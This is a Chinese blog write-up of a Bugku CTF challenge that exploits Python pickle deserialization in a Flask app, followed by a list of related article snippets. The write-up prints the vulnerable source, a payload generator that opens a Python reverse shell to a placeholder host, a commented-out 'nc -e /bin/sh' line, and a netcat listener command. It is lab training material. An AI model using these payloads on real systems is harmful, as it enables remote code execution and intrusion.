Bugku Python Pickle Unserializer

最新推荐文章于 2024-12-27 20:02:35 发布
最新推荐文章于 2024-12-27 20:02:35 发布
阅读量622 收藏 1
点赞数 2
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/prosche_1107/article/details/126840631

(1)搜索站点页面:

dirsearch -u http://114.67.175.224:12574 -e *

发现源代码source页面:


#!/usr/bin/python3
# -*- coding: UTF-8 -*-
"""
@ Author: HeliantHuS
@ Codes are far away from bugs with the animal protecting
@ Time:  2021-08-05
@ FileName: main.py
"""
import pickle
import base64
from flask import Flask, request

app = Flask(__name__)

@app.route("/", methods=["GET"])
def index():
    return """
        <title>404 Not Found</title>
        <h1>Not Found</h1>
        <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    """, 666, [("TIPS", "/source")]

@app.route("/source", methods=["GET"])
def source():
    with open(__file__, "r") as fp:
        return fp.read()

@app.route("/flag", methods=["PUT"])
def get_flag():
    try:
        data = request.json
        if data:
            return pickle.loads(base64.b64decode(data["payload"]))
        return "MISSED"
    except:
        return "OH NO!!!"

if __name__ == '__main__':
    app.run(host="0.0.0.0", port=80)

(2)生成序列化shell,nc连接不可用,使用python一句话shell,注意subprocess.call的参数方式:

import pickle
import base64
import os
import subprocess


class A(object):
def __reduce__(self):
# return (subprocess.call,(['whoami'],))
s = """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IPAddress",Port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"]);"""
return (subprocess.call, (["python3","-c",s],))
# return (subprocess.call, (["nc","IPAddress", "Port","-e","/bin/sh"],))

a = A()
print(base64.b64encode(pickle.dumps(a)))

(3)可从公网访问的控制机启动监听: nc -lvvp Port

(4)Postman 发送,选择PUT方法,Body中选择raw、JSON方式,根据服务器源代码,此处需要标注“payload”及序列化字符串:

(5)控制机获取反弹shell:

(6)根目录下flag:

python pickle漏洞
weixin_44687621的博客
07-27 747
python反序列化漏洞 1.使用pickle库对对象进行序列化和反序列化操作 json反序列化 import json dict={"admin":"123"} json_info = json.dumps(dict) print(str(type(json_info))+json_info) dict1=json.loads(json_info) print(str(type(dict1))) print(dict) pickle反序列化 import pickle class Test:
python pickle模块 序列化
很长很长的专栏
12-01 466
Python内置的pickle模块能够将Python对象序列成字节流,也可以把字节流反序列成对象。 import pickle class Student: def __init__(self, name, age): self.name = name self.age = age def say(self): print("I am", self.name) >>
python pickle反序列化漏洞_浅析python unpickle反序列化漏洞
weixin_39921087的博客
12-08 775
0x01 前言数据序列化常见的应用场景:数据结构网络传输,session存储,cache存储,或者配置文件上传,参数接收等接口处。主要作用:能够让数据在存储或者传输的时候能够单单只用string的类型去表述相对复杂的数据结构,方便应用所见即所得,直接进行数据交流处理。引发的安全问题:PHP的unserialize/__wakeup()漏洞、struts的ognl、xml解析的一系列漏洞、Ruby ...
python pickle反序列化漏洞_Python Pickle反序列化漏洞
weixin_39635432的博客
12-08 341
Python序列化与反序列化Python 的序列化和反序列化是将一个类对象向字节流转化从而进行存储和传输,然后使用的时候再将字节流转化回原始的对象的一个过程几个重要函数Pickle.dump():将Python对象序列化保存到本地的文件中。Pickle.load():载入本地文件,将文件内容反序列化为Python对象。Pickle.dumps():将Python对象序列化为字符串。Pickle.l...
python pickle反序列化漏洞_Python Pickle反序列化带来的安全问题
weixin_39683021的博客
12-08 271
Python Pickle反序列化带来的安全问题GaRY | 2013-01-14 15:00Author: wofeiwo#80sec.com数据序列化,这是个很常见的应用场景,通常被广泛应用在数据结构网络传输,session存储,cache存储,或者配置文件上传,参数接收等接口处。主要作用是为了能够让数据在存储或者传输的时候能够单单只用string的类型去表述相对复杂的数据结构,方便应用所...
python pickle反序列化漏洞_(Python)cPickle反序列化漏洞
weixin_39851048的博客
12-08 315
基本概念Python中有个库可以实现序列化和反序列化操作,名为pickle或cPickle,作用和PHP的serialize与unserialize一样,两者只是实现的语言不同,一个是纯Python实现、另一个是C实现,函数调用基本相同,但cPickle库的性能更好,因此这里选用cPickle库作为示例。cPickle可以对任意一种类型的Python对象进行序列化操作。下面是主要的四个函数:cPi...
python pickle反序列化漏洞_Python的一些高级特性以及反序列化漏洞
weixin_40006763的博客
12-08 225
0x01 简述文章主要记录一下python高级特性以及安全相关的问题python作为脚本语言,其作为高级语言是由c语言开发的,关于python的编译和链接可以看向这里https://github.com/python/cpython(建议自己读读源码,可以更好的理解python的语言特性等。)python标准库:python标准库包含内置模块(有c语言实现,主要提供接入系统的基本功能,例如文件的I...
python随机抽样 bug_python pickle 使用中的一个bug
weixin_39669147的博客
12-11 123
pickle 使用一直折腾一个问题,,终于折腾搞定,, 参考如下:encoding='iso-8859-1' 增加编码形式规定,,Traceback (most recent call last):File “Main.py”, line 4, intrain, test, dicts = pickle.load(open(“./dataset/atis.pkl”, “rb”))Unicode...
python pickle库_Python pickle类库介绍(对象序列化和反序列化)
weixin_39826984的博客
12-11 375
一、picklepickle模块用来实现python对象的序列化和反序列化。通常地picklepython对象序列化为二进制流或文件。python对象与文件之间的序列化和反序列化:代码如下:pickle.dump()pickle.load()如果要实现python对象和字符串间的序列化和反序列化,则使用:代码如下:pickle.dumps()pickle.loads()可以被序列化的类型有:* ...
python pickle反序列化漏洞
weixin_43610673的博客
05-20 3627
前置知识 什么是pickle picklePython专用的一个进行序列化和反序列化的工具包,pickle能表示Python几乎所有的类型(包括自定义类型),由一系列opcode组成,模拟了类似堆栈的内存。 与PHP序列化或者JSON,这些以键值对形式存储序列化对象数据的不同,pickle 序列化(Python独有)是将一个 Python 对象及其所拥有的层次结构变成可以持久化储存的二进制数据,无法像JSON 一样直观阅读。在Python中,采用术语 封存 (pickling)和 解封 (unpickli
Python 序列化与反序列化(pickle 标准库的使用)
qq_42681787的博客
11-09 2414
在计算机网络通信中,不同机器间的通讯需要采用约定的协议,而序列化和反序列化就是属于通讯协议的一部分。通讯协议往往采用分层模型,不同模型每层的功能定义以及颗粒度不同,例如:TCP/IP协议是一个四层协议,而OSI模型却是七层协议模型。在OSI七层协议模型中展现层(Presentation Layer)的主要功能是把应用层的对象转换成一段连续的二进制串,或者反过来,把二进制串转换成应用层的对象--这两个功能就是序列化和反序列化。序列化: 将数据结构或对象转换成二进制串的过程。
玩转序列化,用这个库就对了:Pythonpickle库详解
AIGC搞起
12-22 1569
print(loaded_obj.name) # 输出:Kimipickle库是Python中一个强大而灵活的序列化工具,它允许我们轻松地将Python对象保存到文件中,并在需要时恢复它们。通过本文的介绍,我们了解了pickle的基本用法、常见场景以及可能遇到的问题和解决方案。掌握pickle,将使你在处理对象持久化时更加得心应手。
bugku unserialize-Noteasy笔记
最新发布
2401_84140255的博客
12-27 564
刚开始还以为能用system,结果上网搜发现system只会执行第一个参数,第二个参数是存储命令输出的最后一行。令$a=create_function,$b=}system("ls /");最后看了评论区才知道用的是create_function的漏洞。过滤了ls,所以让$b=}system("l\s /");但是执行destruct方法时还会执行一个过滤函数check。然后再让$b=}system("tac /flag");拼接成有效的 PHP 函数代码,并通过。$a("", $b);
CTF题型 Pythonpickle反序列化进阶利用&amp;例题&amp;opache绕过(1)
m0_61331573的博客
04-07 406
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
ctf系列-bugku靶场 web记录 SSTI 1 2 python flask框架 模板注入
YouthBelief的博客
03-04 953
ctf系列-bugku靶场 web记录Simple_SSTI_1 模板注入SSTI_2 Simple_SSTI_1 模板注入 (1)启动环境 (2)抓包访问链接 发现响应包 显示为python服务 源码 提示 你需要传入一个flag的参数 你知道,在这套flask框架中,我们经常设置一个secret_key 变量 (3)测试flag参数 http://114.67.175.224:17072/?flag={{2*2}} (4)根据提示获取SECRET_KEY变量 http://114.67.175
python项目代码审计_Python 代码审计的另外几个反序列化漏洞检查点
weixin_39626211的博客
11-29 296
哔哔两句最近刚做完某个白盒渗透项目,通读了整个项目代码后发现了几个比较明显的 Python 反序列化漏洞的问题。代码中使用了 Pickle 这个 Python 反序列化模块,除此以外还发现了另外一个比较陌生的模块。from sklearn.externals import joblib因为在这个项目中 pickle 模块加载的都是扩展名为 .pkl 的文件,我认为它是 PicK Le 的缩写,经过...
bugku-ctf-python脚本的使用
weixin_43803070的博客
05-12 619
BUGKU-web基础$_GET: BUGKU-web基础$_POST
CTF之Bugku 秋名山老司机+python脚本代码解析
weixin_41607190的博客
02-26 1248
第一次写python脚本,之前完全不懂脚本运行的原理,寒假学了javaWEB才有点明白,有些脚本的题也可以做了。 先贴上这道题的脚本: import requests import re url='http://123.206.87.240:8002/qiumingshan/' r = requests.session() requestpage = r.get(url) ans = re.fin...
python pickle反序列化漏洞_Python反序列漏洞分析
weixin_39960147的博客
12-08 545
什么是序列化?程序运行的过程中,变量都是在内存中的,当程序一旦执行完毕结束退出后,变量占有的内存就被释放。如果将内存中的变量持久化存储到磁盘中,这个过程就成为序列化;下次运行的时候从磁盘中读取变量到内存中,这个过程就成为反序列化。在python中序列化称为pickling,反序列化被称为pickling;在php中序列化被称为serialization,反序列化被称为unserialization...
Python pickle模块序列化与反序列化实战教程
标签“python pickle模块”表明这个压缩包文件将聚焦于Python编程语言中的pickle模块,这是Python的一个内置库,不需要安装额外的包就可以直接使用。 压缩包的文件名称列表只有一个条目:“面向对象案例”,这表明...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值